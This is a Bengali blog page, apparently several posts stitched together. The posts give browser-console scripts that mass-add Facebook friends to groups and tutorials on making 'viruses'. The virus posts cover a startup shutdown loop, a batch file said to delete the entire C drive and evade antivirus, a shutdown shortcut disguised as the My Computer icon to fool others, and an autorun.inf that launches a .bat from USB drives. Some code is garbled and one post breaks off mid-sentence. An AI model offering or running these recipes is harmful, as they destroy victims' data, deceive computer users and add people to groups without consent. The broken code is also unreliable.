মঙ্গলবার, ৫ মে, ২০১৫

একটি মাত্র ক্লিক এ আপনার সকল বন্ধু কে আপানার facebook গ্রুপ এ অ্যাড করুন

প্রথমে আমার সালাম নেবেন । আশা করি ভালো আছেন ।কারণ TipsRound.Comএর সাথে থাকলে সবাই ভালো থাকে ।আর আপনাদের দোয়ায় আমি ও ভালো আছি ।তাই আজ নিয়ে এলাম আপনাদের জন্য আরেক টা নতুন টিপস ।আর কথা বাড়াবো না কাজের কথায় আসি ।

আমরা ফেসবুক গ্রুপ নিয়ে কমবেশি সবাই জানি। ফেসবুক গ্রুপ হচ্ছে কোন বিষয় নিয়ে বিস্তারিত মত প্রকাশের সবচেয়ে উত্তম উপায়। তবে গ্রুপ এ সদস্য বাড়ানো একটু সময় সাপেক্ষ ব্যাপার। একজন একজন করে বন্ধু অ্যাড করাও অনেক বিরক্তিকর কাজ। এই বিরক্তি কমানোর জন্য আজ আমি নিয়ে এলাম একটি ট্রিক্স। যার মাধ্যমে খুব সহজে অল্প সময়ে আপনার বন্ধু তালিকার সবাই কে অ্যাড করতে পারবেন... আসুন শুরু করা যাক... নিচের স্টেপ গুলো মনোযোগ দিয়ে ফলো করুন...
১ঃ আপনার firefox ব্রাউজার ওপেন করুন।
২ঃ facebook এ লগইন করুন। আপনার কাঙ্খিত গ্রুপ এ প্রবেশ করুন।
৩ঃ এবার Ctrl Shift K চাপুন। নিচের ছবির মত একটি একটি window আসবে। ছবির নিচে দেখুন লেখা আছে (এখানে paste করুন)। সেখানে নিচের কোড টি কপি করে পেস্ট করুন।
Sorry We Can Not View This Image.  Loading...



৪ঃ এবার Enter চাপুন।

৫ঃ এবার Ctrl Shift K আবার চাপুন। আপনার কাজ শেষ। দেখবেন নিচের ছবির মত বন্ধু অ্যাড হচ্ছে।
Sorry We Can Not View This Image.  Loading...
Sorry We Can Not View This Image.  Loading...

****সতর্কতাঃ সব ফ্রেন্ড অ্যাড হওয়ার আগে লগ আউট করবেন না।

###এবার আসুন কিভাবে পেজ এ like পাবার জন্য সব বন্ধু কে request পাঠাবেন তা জানিঃ

১ঃ আপনার পেজ টি ওপেন করুন। সবার উপরে Buid audience এ ক্লিক করুন। invite friends এ ক্লিক করুন। একটা লিস্ট আসবে। লিস্ট এ স্ক্রল করে শেষ ফ্রেন্ড পর্যন্ত দেখুন।
Sorry We Can Not View This Image.  Loading...

২ঃ বার Ctrl Shift K চাপুন। নিচের ছবির মত একটি একটি window আসবে। ছবির নিচে দেখুন লেখা আছে (এখানে paste করুন)। সেখানে নিচের কোড টি কপি করে পেস্ট করুন।

javascript:elms=document. getElementsByName("checkableitems []");for (i=0;i < elms.length;i ){if (elms.type="checkbox" )elms.click()};
৩ঃ এবার Enter চাপুন। ৪ঃ এবার Ctrl Shift K আবার চাপুন। এবার submit এ ক্লিক করুন।

ভালো থাকুন সুস্থ থাকুন ।আর নতুন কিছু পেতে । mew2tips.blogspot.comএর সাথেই

থাকবেন

রবিবার, ২৬ এপ্রিল, ২০১৫


নিজে নিজেই ভাইরাস তৈরী করুন !!!


আজ আমরা একটি মজার জিনিস শিখবো। আর এই মজার জিনিসটি হলো Shutdown Virus । চলুন দেখি কিভাবে ভাইরাসটি তৈরী করা যায়।

যা যা করতে হবে :

(১) ডেক্সটপে মাউচ রেখে মাউচের বামপাশের বোতামে ক্লিক করুন।

এখন New তে গিয়ে Shortcut এ ক্লিক করুন।
(2) এখন Type করুন shutdown –s –t 10 –c “A Virus was found !!! “Your computer will restart now.”
বুঝতে সমস্যা হলে নিজের ছবির দিকে খেয়াল করুন।

(10 এর স্থানে আপনি যা লিখবেন ঠিক সেই সময় পর আপনার কম্পিউটারটি বন্ধ হবে। ধরুন আপনি 20 সেকেন্ড পর বন্ধ করতে চাচ্ছেন, তাহলে 20 লিখবেন। 1 মিনিট হলে 60, 2 মিনিট হলে 2*60=120 , 5 মিনিট হলে 5*60=300 , 30 মিনিট হলে 30*60=1800 ইত্যাদি। অর্থাৎ সময় কে সেকেন্ডে কনভার্ট করে নিবেন। আর ইনভার্টেট কমার ভিতর যা লিখবেন, ঠিক সেই মেসেজটি কম্পিউটার বন্ধ হওয়ার আগে দেখাবে।)
(৩) এখন Next-এ ক্লিক করুন। ফলে নিচের ছবির ন্যায় একটি উইনডো দেখাবে।

(৪) এখন Finish-এ ক্লিক করুন।

তৈরী হয়ে গেল shutdown virus । এখন এটিকে cut করে start-এ গিয়ে startup Folder-এ paste করুন। এখন কম্পিউটারটিকে একবার restart দিন। ব্যাস কাজ শেষ। এখন সময় দেখুন। ঠিক 10 সেকেন্ড পর কম্পিটার একটি মেসেজ দেখাবে A Virus was found !!! “Your computer will restart now. এবং বন্ধ হয়ে যাবে। আবার অন করলে 10 সেকেন্ড পর তা আবার একই মেসেজ দেখিয়ে বন্ধ হয়ে যাবে।

সমাধান :
আপনার কম্পিউটারটিকে আবার পূর্বের অবস্থায় ফিরিয়ে নিতে start-এ গিয়ে startup Folder-এ গিয়ে shutdown.exe এই ফাইলটিকে delete করে দিন।

ধন্যবাদ সব্বাইকে।।।B-)B-)B-)


এবার আপনি নিজেই ভাইরাস তৈরী করুন

আসসালামু আলাইকুম। কেমন আছেন
সবাই? আশা করি সবাই ভালোই আছেন।
আমিও আপনাদের দোয়ায় আল্লাহর
রহমতে ভালো আছি।
আজ এই
পোস্টে আমি আপনাদেরকে ব্যাচ
ফাইল ব্যবহার করে অতি সহজেই একটি খুব
শক্তিশালী ও মারাত্তক বিপদজনক
কম্পিউটার ভাইরাস
তৈরি করা দেখাব ।
এটি তৈরি করতে কোন Software এর
দরকার হবেনা । Notepad দিয়েই এই
ভাইরাসটি তৈরি করা যাবে । এই Virus
টির ভাল দিক হল
কোনো অ্যান্টিভাইরাস
দ্বারা এটি সনাক্ত হয় না ।
এই VIRUS টা কি করতে পারে ???
এই virus টা আপনার কম্পিউটারের C: drive
সম্পূর্ণ Delete করে দেবে ।
কিভাবে VIRUS
টি তৈরি করবেন ???
১) প্রথমে Notepad open করুন ।
{ @Echo off
Del C: *.* |y }
২) উপরের code টি copy করে notepad -এ
paste করুন ।
৩) এবার file টা virus.bat নামে save করুন
( আপনি চাইলে যেকন নামে save
করতে পারেন তবে নামের শেষে .bat
অবশ্যই দিতে হবে ) ।
virus তৈরি হইয়ে গেছে, এখন সুধু virus
টি run করার পালা ।
সতর্কবাণী: দয়া করে আপনার
নিজের কম্পিউটারে চালানোর
চেষ্টা করবেন না বা অন্যথায়
এটা আপনার সি ড্রাইভ

নিজেই তৈরী করুন Fake Virus

ব্যপারটা হয়তো অনেকের জানা। যাদের জানা নাই তাদের জন্য এখানে দিলাম....
computer_virus.jpg
নিয়মাবলী

  1. desktop-এ right click করে নতুন shortcut creat করুন।
  2. location box- এ type করুন: shutdown -s -t 30 -c "trojan horse detected. Your computer might be at risk. Windows is shutting down."
  3. Next>Finish চাপুন| দেখুন shutdown.exe নামে নতুন একটি shortcut icon তৈরী হয়েছে।
  4. icon -টি rename করে "My Computer" লিখুন। এখন icon-টিতে right click করে properties>change icon-এ যান। সেখান থেকে My Computer-এর icon select করে ok করুন।
  5. Desktop থেকে আগের My Computer icon-টি remove করে দি।
এখন কেউ যদি My Computer মনে করে double click করে তবে একটা error msg আসবে যাতে লেখা থাকবে: "Trojan horse detected. Your computer might be at risk. Windows is shutting down."
সাথে সাথে countdown শুরু হবে এবং 30s-এর মধ্যে system shutdown হবে....

 আপনি যদি সময় কমাতে বা বাড়াতে চান তাহলে "t"-এর পরে তা লিখে দিন| আর error msg change করতে হলে "c"-এর পরে তা লিখুন।

নিজেই তৈরী করুন Autorun Virus


আমরা মোটামুটি সবাই autorun virus এর সাথে পরিচিত। আর সাধারণত Pendrive এ autorun virus টি আমরা অনেক বেশি দেখতে পাই। autorun virus কম্পিউটারের তেমন কোন ক্ষতি করতে পারে না। তবে এই ছোট ভাইরাসের কারণে মাঝে মধ্যে বেশ ঝামেলা পোহাতে পারে। একেবারে ছোট করে দেখাও ঠিক নয়। USB Disk Security সফটওয়্যার টি ব্যবহার করে খুব সহজেই এই ভাইরাসের হাত থেকে মুক্ত থাকা সম্ভব। যাই হোক এখন আমরা শিখব কি করে autorun virus তৈরী করা যায়। ভাইরাস টি তৈরী করা খুবই সহজ শুধু মাত্র একটি কোড নোটপ্যাড এ লিখলেই হয়ে যাবে। প্রথমে নোটপ্যাড ওপেন করুন তারপর নিচের কোডটি কপি করে নোটপ্যাডে পেষ্ট করুনঃ
[autorun]
Open=Pirus.bat
Shellexecute=Pirus.bat
এখন ফাইলটি সেভ করুন autorun.inf এই নামে। ব্যাস তৈরী হয়ে গেল autorun virus. ভাইরাস বানানো নিয়ে এটি আমার প্রথম পোষ্ট তবে আমি পরবর্তীতে আরও অনেক পোষ্ট করব ভাইরাস বানানো এবং হ্যাকিং সম্পর্কিত বিষয় নিয়ে। পোষ্টগুলো পেতে আজ থেকে প্রতিদিন চোখ রাখুন